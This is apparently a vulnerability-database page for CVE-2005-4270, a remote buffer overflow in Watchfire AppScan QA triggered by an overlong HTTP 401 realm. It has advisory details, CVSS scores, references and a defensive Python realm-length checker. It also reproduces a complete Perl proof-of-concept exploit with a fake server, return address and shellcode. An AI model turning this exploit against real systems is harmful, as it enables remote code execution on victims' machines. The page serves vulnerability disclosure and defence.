CVE-2005-4270
CVSS 7.5
Published: 2005-12-15 15:11:00
Revised: 2011-03-07 21:27:55
NMCOE

[Original] Buffer overflow in Watchfire AppScan QA 5.0.609 and 5.0.134 allows remote web servers to execute arbitrary code via an HTTP 401 response with a WWW-Authenticate header containing a long Realm field.


[CNNVD] Watchfire AppScan QA Remote Buffer Overflow Vulnerability (CNNVD-200512-313)

A buffer overflow vulnerability exists in Watchfire AppScan QA 5.0.609 and 5.0.134. A remote web server can execute arbitrary code by sending an HTTP 401 response whose WWW-Authenticate header contains a long Realm field.
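
A defender-side check for this class of bug, added here as an example (it is not code from the advisory, the vendor or the PoC on this page): it parses the WWW-Authenticate challenge of a raw HTTP response and flags a realm that is oversized or never closed, which is the condition the crafted 401 response abuses. The 128-byte threshold and the three sample responses are constructed assumptions, not captured traffic.

```python
import re

# Realm lengths above this are treated as suspicious (assumption: a sane realm is a short label).
MAX_REALM_LEN = 128

def extract_realm(value):
    """Return (realm, terminated) for a challenge such as 'Basic realm="x"'.
    Handles quoted-pairs and a quoted-string that is never closed."""
    m = re.search(r'(?i)(?:^|[\s,])realm\s*=\s*', value)
    if not m:
        return None, True
    rest = value[m.end():]
    if not rest.startswith('"'):
        return rest.split(",")[0].strip(), True  # bare token form
    out, i = [], 1
    while i < len(rest):
        c = rest[i]
        if c == '"':
            return "".join(out), True
        if c == "\\" and i + 1 < len(rest):  # quoted-pair: \x becomes x
            i += 1
            c = rest[i]
        out.append(c)
        i += 1
    return "".join(out), False  # ran off the end: closing quote missing

def check_response(raw, limit=MAX_REALM_LEN):
    """Inspect raw response bytes and flag oversized or unterminated realms."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    code = parts[1] if len(parts) > 1 else ""
    findings = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "www-authenticate":
            continue
        realm, terminated = extract_realm(value.strip())
        if realm is not None and (len(realm) > limit or not terminated):
            findings.append({"realm_len": len(realm), "terminated": terminated})
    return {"status": code, "suspicious": bool(findings), "findings": findings}

# Constructed sample responses (not captured traffic).
BENIGN = (b'HTTP/1.1 401 Authorization Required\r\nServer: Apache\r\n'
          b'WWW-Authenticate: Basic realm="Admin Area"\r\n\r\n')
OVERSIZED = (b'HTTP/1.1 401 Authorization Required\r\nServer: Apache\r\n'
             b'WWW-Authenticate: Basic realm="' + b"A" * 400 + b'"\r\n\r\n')
UNTERMINATED = (b'HTTP/1.1 401 Authorization Required\r\n'
                b'WWW-Authenticate: Basic realm="' + b"A" * 50 + b'\r\n\r\n')
```

The same check can sit in a forward proxy or an IDS content rule in front of a vulnerable scanner host; a realm that is hundreds of bytes long or has no closing quote has no legitimate use.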

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may result in modification of system files]
Availability impact: PARTIAL [may cause degraded performance or interruption of resource access]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (Affected Platforms and Products)

cpe:/a:watchfire:appscan_qa:5.0.134
cpe:/a:watchfire:appscan_qa:5.0.609

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4270
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4270
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-313
(Official data source) CNNVD

- Other Links and Resources

http://www.vupen.com/english/advisories/2005/2933
(UNKNOWN)  VUPEN  ADV-2005-2933
http://www.securityfocus.com/bid/15873
(UNKNOWN)  BID  15873
http://www.securityfocus.com/archive/1/archive/1/419586/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051215 CYBSEC - Security Advisory: Watchfire AppScan QA Remote Code Execution
http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf
(UNKNOWN)  MISC  http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf
http://securitytracker.com/id?1015362
(UNKNOWN)  SECTRACK  1015362
http://secunia.com/advisories/18013
(UNKNOWN)  SECUNIA  18013
http://securityreason.com/securityalert/260
(UNKNOWN)  SREASON  260

- Vulnerability Information

Watchfire AppScan QA Remote Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-12-15 00:00:00 2006-01-10 00:00:00
Remote

- Advisories and Patches

- Vulnerability Information (1374)

Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC (EDBID:1374)
windows remote
2005-12-15 Verified
0 Mariano Nuñez
#!/usr/bin/perl -w
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
#	1. Run this script to set up the fake web server.
#	2. Scan the server with AppScan QA, either in Interactive or Manual mode.
#	3. If you get a "You are vulnerable!" popup, you should upgrade immediately.
#
#	PoC developed for Windows 2000 Server SP4.
#

use IO::Socket::INET;

# Disable output buffering
$| = 1;

# Define the 200 OK response (links to a "protected" /admin resource)
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\n<a href='/admin'>admin</a>";

# Define the 401 Authorization Required header and tail; the realm value is filled in below
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization Required</title>\r\n</head><body>\r\n<h1>Authorization Required</h1>\r\n<p>This server could not verify that you\r\nare authorized to access the document\r\nrequested.  Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.</p>\r\n</body></html>";

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

# Payload: pops a MessageBoxA reading "You are vulnerable!"
my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x6c\x65\x21\x4e";

# The overlong realm: padding, short jump, return address, payload
my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail;

# Initialization of the fake web server (binds port 80, so it needs privileges)
my $srv = IO::Socket::INET->new(LocalPort => 80,
				Reuse => 1,
				Listen => 1 ) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";

while (my $cli = $srv->accept()) {
	printf "Request from %s\n", $cli->peerhost;
	while (<$cli>) {
		if (s/(admin)/$1/) {
			# If the request is for "admin", launch the exploit
			printf "Request for protected resource detected...launching exploit\n";
			print $cli $resExploit;
		}
		else {
			# Otherwise send a normal response
			print $cli $res200;
		}
	}
	close($cli);
}
close($srv);


# milw0rm.com [2005-12-15]

- Vulnerability Information

21746
Watchfire AppScan QA 401 HTTP Response Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

Unknown or Incomplete

- Timeline

2005-12-15 2005-10-12
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete